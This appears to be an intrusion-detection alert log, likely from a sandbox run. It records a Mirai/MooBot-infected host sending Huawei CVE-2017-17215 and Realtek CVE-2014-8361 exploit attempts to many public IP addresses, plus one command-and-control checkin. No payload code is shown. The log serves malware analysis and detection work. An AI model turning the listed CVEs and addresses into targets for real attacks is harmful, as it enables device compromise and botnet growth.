                                                2024-07-20T23:05:34.676145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550437215192.168.2.1490.121.157.161
                                                2024-07-20T23:05:33.865110+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.1441.185.62.167
                                                2024-07-20T23:05:36.334366+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.14197.248.32.116
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5163652869192.168.2.14204.66.149.99
                                                2024-07-20T23:05:36.363903+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293237215192.168.2.14197.251.112.30
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4735452869192.168.2.14131.178.64.107
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416652869192.168.2.1446.103.116.159
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619037215192.168.2.14157.221.39.140
                                                2024-07-20T23:05:34.670999+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.1441.188.190.222
                                                2024-07-20T23:05:44.673284+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3450652869192.168.2.14142.243.145.171
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001637215192.168.2.14176.127.129.109
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4923652869192.168.2.14155.49.251.8
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688237215192.168.2.14197.26.201.125
                                                2024-07-20T23:05:42.145992+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553637215192.168.2.14197.179.141.156
                                                2024-07-20T23:05:33.859645+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938637215192.168.2.14157.32.82.175
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506437215192.168.2.14157.26.125.186
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14157.131.171.170
                                                2024-07-20T23:05:52.655576+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3710852869192.168.2.14210.13.132.2
                                                2024-07-20T23:05:34.682964+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854837215192.168.2.1441.145.104.135
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.1492.57.180.103
                                                2024-07-20T23:05:34.682964+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748237215192.168.2.14197.163.208.222
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256452869192.168.2.1436.216.251.126
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313237215192.168.2.14157.124.133.127
                                                2024-07-20T23:05:33.865440+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.14157.182.246.174
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859637215192.168.2.14197.66.178.193
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800252869192.168.2.14177.160.195.13
                                                2024-07-20T23:05:40.490930+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5186452869192.168.2.14164.11.137.216
                                                2024-07-20T23:05:33.858846+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617437215192.168.2.14157.58.89.166
                                                2024-07-20T23:05:36.616913+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454637215192.168.2.14197.59.10.121
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3583252869192.168.2.14172.126.0.115
                                                2024-07-20T23:05:36.359784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005637215192.168.2.14197.47.5.182
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443637215192.168.2.14197.235.65.47
                                                2024-07-20T23:05:40.388443+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736452869192.168.2.1438.103.25.108
                                                2024-07-20T23:05:33.863434+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636437215192.168.2.1441.135.32.84
                                                2024-07-20T23:05:36.555197+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.14197.52.98.160
                                                2024-07-20T23:05:33.859645+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133437215192.168.2.1441.112.53.44
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613652869192.168.2.1457.144.122.58
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011652869192.168.2.1420.40.190.208
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290237215192.168.2.14157.246.21.11
                                                2024-07-20T23:05:36.550808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158237215192.168.2.1447.179.50.213
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.14197.23.105.2
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638852869192.168.2.1438.130.134.142
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5205452869192.168.2.1468.10.183.207
                                                2024-07-20T23:05:37.693492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5052252869192.168.2.1477.237.114.164
                                                2024-07-20T23:05:36.334366+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849837215192.168.2.1441.19.128.6
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774052869192.168.2.1435.159.139.53
                                                2024-07-20T23:05:33.871999+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.14157.248.11.159
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5793452869192.168.2.14156.87.172.3
                                                2024-07-20T23:05:45.480765+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097437215192.168.2.1465.114.222.117
                                                2024-07-20T23:05:37.716310+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5556252869192.168.2.14180.106.180.212
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4855452869192.168.2.14168.99.192.8
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437437215192.168.2.1441.196.91.80
                                                2024-07-20T23:05:34.670904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373237215192.168.2.14197.152.47.25
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3988852869192.168.2.148.166.54.209
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907652869192.168.2.14202.183.171.29
                                                2024-07-20T23:05:52.581630+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336252869192.168.2.14109.136.114.158
                                                2024-07-20T23:05:33.866260+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.14157.198.219.2
                                                2024-07-20T23:05:45.480765+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.1441.205.214.141
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006452869192.168.2.14198.22.21.63
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3509652869192.168.2.14136.195.130.35
                                                2024-07-20T23:05:33.872000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924637215192.168.2.14158.245.1.223
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5829652869192.168.2.14212.160.183.244
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936237215192.168.2.14185.101.34.75
                                                2024-07-20T23:05:33.865484+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.1424.82.183.93
                                                2024-07-20T23:05:36.549825+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112437215192.168.2.1441.202.249.78
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4267852869192.168.2.14107.226.165.86
                                                2024-07-20T23:05:38.610030+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4164652869192.168.2.14191.244.73.243
                                                2024-07-20T23:05:36.354373+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629437215192.168.2.14197.239.103.184
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5721452869192.168.2.14199.202.13.130
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709252869192.168.2.14173.175.30.8
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4924252869192.168.2.1431.247.190.180
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056837215192.168.2.14157.113.23.58
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527837215192.168.2.1441.16.187.35
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974237215192.168.2.14197.152.249.5
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752252869192.168.2.14185.59.206.117
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3518852869192.168.2.14170.98.124.78
                                                2024-07-20T23:05:48.937448+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.1441.49.32.49
                                                2024-07-20T23:05:48.935408+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288437215192.168.2.14197.236.154.168
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.1441.243.247.233
                                                2024-07-20T23:05:34.679255+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950637215192.168.2.14157.51.200.31
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204037215192.168.2.14157.187.107.148
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.14152.41.190.171
                                                2024-07-20T23:05:34.658684+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975637215192.168.2.14157.12.154.103
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961452869192.168.2.1459.242.125.217
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134837215192.168.2.1441.70.222.142
                                                2024-07-20T23:05:36.343632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3841037215192.168.2.14157.135.248.171
                                                2024-07-20T23:05:36.359785+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979637215192.168.2.14157.57.125.1
                                                2024-07-20T23:05:40.451545+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4677852869192.168.2.14157.151.72.129
                                                2024-07-20T23:05:39.705937+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815237215192.168.2.14177.75.203.96
                                                2024-07-20T23:05:48.937449+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985637215192.168.2.1418.9.43.125
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261637215192.168.2.14197.91.156.105
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067852869192.168.2.1489.113.83.91
                                                2024-07-20T23:05:36.360018+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221437215192.168.2.14157.76.194.96
                                                2024-07-20T23:05:37.675355+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5455052869192.168.2.14134.144.46.130
                                                2024-07-20T23:05:42.296632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092437215192.168.2.1441.16.230.87
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256652869192.168.2.14149.79.37.237
                                                2024-07-20T23:05:52.571724+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3917852869192.168.2.14202.78.132.130
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312252869192.168.2.1464.61.239.79
                                                2024-07-20T23:05:52.685424+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3405252869192.168.2.14182.31.232.148
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100452869192.168.2.14175.91.47.151
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726837215192.168.2.14197.199.66.253
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5720652869192.168.2.14113.47.213.157
                                                2024-07-20T23:05:33.870526+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.1441.103.45.78
                                                2024-07-20T23:05:52.591717+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4040052869192.168.2.1445.125.38.2
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14157.14.174.37
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3570252869192.168.2.1459.135.63.153
                                                2024-07-20T23:05:39.114849+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736837215192.168.2.14197.252.40.127
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246052869192.168.2.14132.253.188.42
                                                2024-07-20T23:05:33.863434+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478237215192.168.2.14110.124.171.180
                                                2024-07-20T23:05:34.658684+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.14157.28.53.140
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.14197.78.71.227
                                                2024-07-20T23:05:37.462009+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3629652869192.168.2.1431.136.109.228
                                                2024-07-20T23:05:34.658684+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345637215192.168.2.14197.167.43.41
                                                2024-07-20T23:05:47.142619+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831637215192.168.2.14157.238.207.80
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332037215192.168.2.14197.220.34.254
                                                2024-07-20T23:05:36.352367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881637215192.168.2.1441.127.89.65
                                                2024-07-20T23:05:37.664968+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476052869192.168.2.14142.219.250.29
                                                2024-07-20T23:05:37.566372+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887652869192.168.2.1491.85.138.225
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4444052869192.168.2.14123.111.19.233
                                                2024-07-20T23:05:34.684902+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308837215192.168.2.1478.116.111.6
                                                2024-07-20T23:05:36.343632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413037215192.168.2.14157.241.110.249
                                                2024-07-20T23:05:37.863376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4931252869192.168.2.1468.40.200.159
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053037215192.168.2.14204.51.37.135
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897452869192.168.2.14206.53.82.225
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4520652869192.168.2.14103.14.70.39
                                                2024-07-20T23:05:52.616927+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940052869192.168.2.14223.116.88.128
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189237215192.168.2.14125.218.223.230
                                                2024-07-20T23:05:40.403015+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3683652869192.168.2.14193.96.47.59
                                                2024-07-20T23:05:47.061515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.1436.148.155.222
                                                2024-07-20T23:05:37.693492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6017252869192.168.2.14137.134.252.4
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4886052869192.168.2.14153.104.11.80
                                                2024-07-20T23:05:36.004037+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494237215192.168.2.14180.149.134.73
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897852869192.168.2.14145.195.83.181
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5518052869192.168.2.1427.129.79.40
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087052869192.168.2.1481.167.63.48
                                                2024-07-20T23:05:34.670731+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765437215192.168.2.14197.155.87.199
                                                2024-07-20T23:05:34.670904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897237215192.168.2.1444.66.223.184
                                                2024-07-20T23:05:34.671000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357837215192.168.2.14197.101.55.74
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14157.173.188.51
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5222252869192.168.2.14105.87.255.111
                                                2024-07-20T23:05:45.383849+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572037215192.168.2.14197.72.11.79
                                                2024-07-20T23:05:37.716310+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451452869192.168.2.1473.174.204.179
                                                2024-07-20T23:05:34.670904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930237215192.168.2.14197.1.71.210
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755237215192.168.2.1441.45.136.104
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.14107.117.108.202
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287437215192.168.2.1441.186.116.94
                                                2024-07-20T23:05:52.613580+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4224052869192.168.2.1417.65.162.120
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378237215192.168.2.14157.176.218.10
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3426452869192.168.2.1451.84.22.246
                                                2024-07-20T23:05:38.956391+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.14158.191.230.234
                                                2024-07-20T23:05:37.804118+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5801252869192.168.2.14218.210.113.18
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298652869192.168.2.14205.35.169.26
                                                2024-07-20T23:05:47.331187+0200TCP2030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)469142466192.168.2.1415.235.203.214
                                                2024-07-20T23:05:36.060906+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596652869192.168.2.1460.73.199.117
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5520052869192.168.2.1480.164.32.127
                                                2024-07-20T23:05:52.600203+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5611452869192.168.2.1495.213.237.81
                                                2024-07-20T23:05:38.781505+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4919252869192.168.2.1460.68.102.220
                                                2024-07-20T23:05:37.611583+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360652869192.168.2.141.23.28.195
                                                2024-07-20T23:05:52.661091+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5893852869192.168.2.1460.143.208.198
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5130452869192.168.2.14111.192.150.203
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.248.125.74
                                                2024-07-20T23:05:34.676834+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513837215192.168.2.14157.221.219.70
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4731452869192.168.2.1451.55.196.22
                                                2024-07-20T23:05:34.676145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126237215192.168.2.1441.124.78.80
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.1441.124.231.107
                                                2024-07-20T23:05:36.363294+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465637215192.168.2.14197.204.66.242
